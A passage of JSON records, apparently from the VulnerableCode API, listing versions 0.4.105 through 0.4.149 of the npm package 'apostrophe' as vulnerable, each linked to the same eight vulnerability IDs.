67959?format=json","purl":"pkg:npm/apostrophe@0.4.105","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.105"},{"url":"http://public2.vulnerablecode.io/api/packages/267960?format=json","purl":"pkg:npm/apostrophe@0.4.106","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.106"},{"url":"http://public2.vulnerablecode.io/api/packages/267961?format=json","purl":"pkg:npm/apostrophe@0.4.107","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.107"},{"url":"http://public2.vulnerablecode.io/api/packages/267962?format=json","purl":"pkg:npm/apostrophe@0.4.108","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.108"},{"url":"http://public2.vulnerablecode.io/api/packages/267963?format=json","purl":"pkg:npm/apostrophe@0.4.109","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.109"},{"url":"http://public2.vulnerablecode.io/api/packages/267964?format=json","purl":"pkg:npm/apostrophe@0.4.110","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.110"},{"url":"http://public2.vulnerablecode.io/api/packages/267965?format=json","purl":"pkg:npm/apostrophe@0.4.111","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.111"},{"url":"http://public2.vulnerablecode.io/api/packages/267966?format=json","purl":"pkg:npm/apostrophe@0.4.112","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.112"},{"url":"http://public2.vulnerablecode.io/api/packages/267967?format=json","purl":"pkg:npm/apostrophe@0.4.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.113"},{"url":"http://public2.vulnerablecode.io/api/packages/267968?format=json","purl":"pkg:npm/apostrophe@0.4.114","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.114"},{"url":"http://public2.vulnerablecode.io/api/packages/267969?format=json","purl":"pkg:npm/apostrophe@0.4.115","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.115"},{"url":"http://public2.vulnerablecode.io/api/packages/267970?format=json","purl":"pkg:npm/apostrophe@0.4.116","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.116"},{"url":"http://public2.vulnerablecode.io/api/packages/267971?format=json","purl":"pkg:npm/apostrophe@0.4.117","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.117"},{"url":"http://public2.vulnerablecode.io/api/packages/267972?format=json","purl":"pkg:npm/apostrophe@0.4.118","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.118"},{"url":"http://public2.vulnerablecode.io/api/packages/267973?format=json","purl":"pkg:npm/apostrophe@0.4.119","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.119"},{"url":"http://public2.vulnerablecode.io/api/packages/267974?format=json","purl":"pkg:npm/apostrophe@0.4.120","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.120"},{"url":"http://public2.vulnerablecode.io/api/packages/267975?format=json","purl":"pkg:npm/apostrophe@0.4.121","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.121"},{"url":"http://public2.vulnerablecode.io/api/packages/267976?format=json","purl":"pkg:npm/apostrophe@0.4.122","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.122"},{"url":"http://public2.vulnerablecode.io/api/packages/267977?format=json","purl":"pkg:npm/apostrophe@0.4.123","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.123"},{"url":"http://public2.vulnerablecode.io/api/packages/267978?format=json","purl":"pkg:npm/apostrophe@0.4.124","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.124"},{"url":"http://public2.vulnerablecode.io/api/packages/267979?format=json","purl":"pkg:npm/apostrophe@0.4.125","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.125"},{"url":"http://public2.vulnerablecode.io/api/packages/267980?format=json","purl":"pkg:npm/apostrophe@0.4.126","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.126"},{"url":"http://public2.vulnerablecode.io/api/packages/267981?format=json","purl":"pkg:npm/apostrophe@0.4.127","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.127"},{"url":"http://public2.vulnerablecode.io/api/packages/267982?format=json","purl":"pkg:npm/apostrophe@0.4.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.128"},{"url":"http://public2.vulnerablecode.io/api/packages/267983?format=json","purl":"pkg:npm/apostrophe@0.4.129","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.129"},{"url":"http://public2.vulnerablecode.io/api/packages/267984?format=json","purl":"pkg:npm/apostrophe@0.4.130","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.130"},{"url":"http://public2.vulnerablecode.io/api/packages/267985?format=json","purl":"pkg:npm/apostrophe@0.4.131","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.131"},{"url":"http://public2.vulnerablecode.io/api/packages/267986?format=json","purl":"pkg:npm/apostrophe@0.4.132","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.132"},{"url":"http://public2.vulnerablecode.io/api/packages/267987?format=json","purl":"pkg:npm/apostrophe@0.4.133","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.133"},{"url":"http://public2.vulnerablecode.io/api/packages/267988?format=json","purl":"pkg:npm/apostrophe@0.4.134","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.134"},{"url":"http://public2.vulnerablecode.io/api/packages/267989?format=json","purl":"pkg:npm/apostrophe@0.4.135","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.135"},{"url":"http://public2.vulnerablecode.io/api/packages/267990?format=json","purl":"pkg:npm/apostrophe@0.4.136","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.136"},{"url":"http://public2.vulnerablecode.io/api/packages/267991?format=json","purl":"pkg:npm/apostrophe@0.4.137","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.137"},{"url":"http://public2.vulnerablecode.io/api/packages/267992?format=json","purl":"pkg:npm/apostrophe@0.4.138","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.138"},{"url":"http://public2.vulnerablecode.io/api/packages/267993?format=json","purl":"pkg:npm/apostrophe@0.4.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.139"},{"url":"http://public2.vulnerablecode.io/api/packages/267994?format=json","purl":"pkg:npm/apostrophe@0.4.140","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.140"},{"url":"http://public2.vulnerablecode.io/api/packages/267995?format=json","purl":"pkg:npm/apostrophe@0.4.142","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.142"},{"url":"http://public2.vulnerablecode.io/api/packages/267996?format=json","purl":"pkg:npm/apostrophe@0.4.143","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.143"},{"url":"http://public2.vulnerablecode.io/api/packages/267997?format=json","purl":"pkg:npm/apostrophe@0.4.144","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.144"},{"url":"http://public2.vulnerablecode.io/api/packages/267998?format=json","purl":"pkg:npm/apostrophe@0.4.145","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.145"},{"url":"http://public2.vulnerablecode.io/api/packages/267999?format=json","purl":"pkg:npm/apostrophe@0.4.146","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.146"},{"url":"http://public2.vulnerablecode.io/api/packages/268000?format=json","purl":"pkg:npm/apostrophe@0.4.147","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.147"},{"url":"http://public2.vulnerablecode.io/api/packages/268001?format=json","purl":"pkg:npm/apostrophe@0.4.148","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.148"},{"url":"http://public2.vulnerablecode.io/api/packages/268002?format=json","purl":"pkg:npm/apostrophe@0.4.149","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VC